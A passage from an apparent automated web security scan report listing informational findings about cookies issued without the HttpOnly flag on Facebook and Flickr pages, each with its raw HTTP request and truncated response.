Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=6G7wO; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 15128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.736. http://www.facebook.com/apps/application.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /apps/application.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=AGZLa; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/application.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=AGZLa; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:12 GMT
Content-Length: 0


14.737. http://www.facebook.com/beirutcityguide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /beirutcityguide

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=oJmQq; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beirutcityguide HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=oJmQq; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 156507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.738. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=isGBp; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=isGBp; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:57 GMT
Content-Length: 0


14.739. http://www.facebook.com/miofeghali

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /miofeghali

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=eDdkX; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=eDdkX; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:26 GMT
Content-Length: 15117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.740. http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Traverse-City-MI/CloudAccessnet/116931806748

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=NxhiV; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Traverse-City-MI/CloudAccessnet/116931806748 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/CloudAccessnet/116931806748
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NxhiV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:06 GMT
Content-Length: 0


14.741. http://www.facebook.com/paty.kfoury

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /paty.kfoury

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=qOxUt; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /paty.kfoury HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qOxUt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.742. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=1Nf86; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php?id=836605415 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1Nf86; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.743. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=2yleE; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=2yleE; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:04 GMT
Content-Length: 10902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.744. http://www.flickr.com/photos/aubalumni/4688630122/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/aubalumni/4688630122/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
  • localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/aubalumni/4688630122/x22 HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:16:26 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
X-Served-By: www121.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Page Not Found</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

...[SNIP]...

14.745. http://www.flickr.com/photos/favoritltd/4795390303/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795390303/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795390303/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:12 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com
X-Served-By: www53.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89342

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-02-23 18.36.45 | Flickr
...[SNIP]...

14.746. http://www.flickr.com/photos/favoritltd/4795390991/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795390991/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795390991/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:10 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com
X-Served-By: www57.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88056

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-05-21 14.19.55 | Flickr
...[SNIP]...

14.747. http://www.flickr.com/photos/favoritltd/4795392149/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795392149/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795392149/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:48 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com
X-Served-By: www88.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 86022

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-03-05 17.55.24 | Flickr
...[SNIP]...

14.748. http://www.flickr.com/photos/favoritltd/4795392811/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795392811/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795392811/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com
X-Served-By: www30.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83646

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-04-13 10.18.02 | Flickr
...[SNIP]...

14.749. http://www.flickr.com/photos/favoritltd/4796022554/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4796022554/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4796022554/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

